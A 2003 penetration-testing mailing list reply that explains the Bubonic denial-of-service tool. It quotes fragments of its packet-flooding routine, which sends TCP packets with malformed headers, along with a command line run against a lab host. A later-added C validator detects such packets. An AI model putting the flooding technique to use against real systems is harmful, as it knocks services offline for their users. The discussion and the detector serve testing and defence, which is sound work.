Penetration Testing mailing list archives

RE: Bubonic DoS tool


From: "Yonatan Bokovza" <Yonatan () xpert com>
Date: Tue, 11 Mar 2003 12:09:40 +0200

-----Original Message-----
From: Indian Tiger [mailto:indiantiger () mailandnews com]
Sent: Thursday, February 06, 2003 18:43
To: pen-test () securityfocus com
Cc: sil () antioffline com
Subject: Bubonic DoS tool


Hi All,

I was testing the "Bubonic.c lame DoS against Windows 2000 machines and
certain versions of Linux" in a test scenario over Linux 8.0. I have compiled
its source code and am running its binary as follows:
# ./bubonic 10.3.10.22 10.3.8.70 100 1000
On executing the above command, there was no observable immediate effect,
but the Hub was showing the collisions (which were the Red Steady). Ethereal
shows the packets routed to destination.
But after executing the command the destination machine must be
blocked/freeze, but it's not happening.

The code is very easy to understand. The "interesting" part is
in flooder(), my comments inline:

void flooder(void)
{
...
    packet.ip.ip_p              = IPPROTO_TCP;
    packet.ip.ip_tos            = rand();
...
    packet.tcp.th_flags         = random();
    packet.tcp.th_win           = 65535;
    packet.tcp.th_seq           = random();
    packet.tcp.th_ack           = 0;
    packet.tcp.th_off           = 0; 
    packet.tcp.th_urp           = random();
    packet.tcp.th_dport         = random();
...
    cksum.pseudo.ptcl           = IPPROTO_TCP;
    cksum.pseudo.tcpl           = random();
...
    for(i=0;;++i) {
...
       if (sendto(sock, &packet, sizeof(packet), 0, (struct sockaddr *)&s_in, sizeof(s_in)) < 0);
    }
}

To sum up and simplify, this sends TCP packets with a bad header.
As a result, my unpatched win2k's CPU graph stays over 90%
in the kernel, causing Albinoni to sound bad.

Best Regards, 

Yonatan Bokovza
IT Security Consultant
Xpert Systems
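
The header fields quoted above (th_off set to 0, random th_flags, a checksum computed over a random pseudo-header length) can be recognised on the receiving side. The following is an added example, not part of the original post and not taken from bubonic.c: a small C validator whose function name, anomaly bit names and sample packet bytes are all constructed for illustration.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* Anomaly bits (names are this example's own, not from any library). */
#define A_TRUNCATED 0x01 /* capture too short for IPv4 + TCP headers */
#define A_BAD_DOFF  0x02 /* TCP data offset < 5 words or past segment */
#define A_BAD_FLAGS 0x04 /* no flags, SYN+FIN, or SYN+RST */
#define A_BAD_CSUM  0x08 /* TCP checksum does not verify */

/* One's-complement accumulation over n bytes, big-endian 16-bit words. */
static uint32_t sum16(const uint8_t *p, size_t n, uint32_t acc)
{
    for (; n > 1; p += 2, n -= 2) acc += ((uint32_t)p[0] << 8) | p[1];
    if (n) acc += (uint32_t)p[0] << 8;
    return acc;
}

/* pkt points at an IPv4 header; returns 0 for clean or non-TCP packets. */
unsigned tcp_anomalies(const uint8_t *pkt, size_t len)
{
    if (len < 20) return A_TRUNCATED;
    if ((pkt[0] >> 4) != 4 || pkt[9] != 6) return 0;   /* not IPv4/TCP */
    size_t ihl = (size_t)(pkt[0] & 0x0f) * 4;
    size_t tot = ((size_t)pkt[2] << 8) | pkt[3];
    if (ihl < 20 || tot > len || tot < ihl + 20) return A_TRUNCATED;

    const uint8_t *tcp = pkt + ihl;
    size_t tlen = tot - ihl;
    size_t doff = (size_t)(tcp[12] >> 4) * 4;
    uint8_t fl = tcp[13] & 0x3f;                       /* URG..FIN */
    unsigned r = 0;
    if (doff < 20 || doff > tlen) r |= A_BAD_DOFF;     /* th_off = 0 lands here */
    if (fl == 0 || (fl & 0x03) == 0x03 || (fl & 0x06) == 0x06) r |= A_BAD_FLAGS;

    /* Pseudo-header: src, dst, protocol 6, real TCP length from the IP header. */
    uint32_t s = sum16(tcp, tlen, sum16(pkt + 12, 8, 6 + (uint32_t)tlen));
    while (s >> 16) s = (s & 0xffff) + (s >> 16);
    if (s != 0xffff) r |= A_BAD_CSUM;
    return r;
}

int main(void)
{
    /* Constructed sample: 10.3.10.22 -> 10.3.8.70, th_off = 0, SYN+FIN set. */
    uint8_t p[40] = {0x45,0,0,40, 0,0,0,0, 64,6,0,0, 10,3,10,22, 10,3,8,70,
                     4,0,0,80, 0,0,0,1, 0,0,0,0, 0x00,0x03,0xff,0xff, 0x85,0x30,0,0};
    printf("anomalies: 0x%02x\n", tcp_anomalies(p, sizeof p));
    return 0;
}
```

When run against captures taken on the sending host, checksum offload can make outbound checksums look invalid, so the A_BAD_CSUM bit is most meaningful on the receiver or on a tap.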
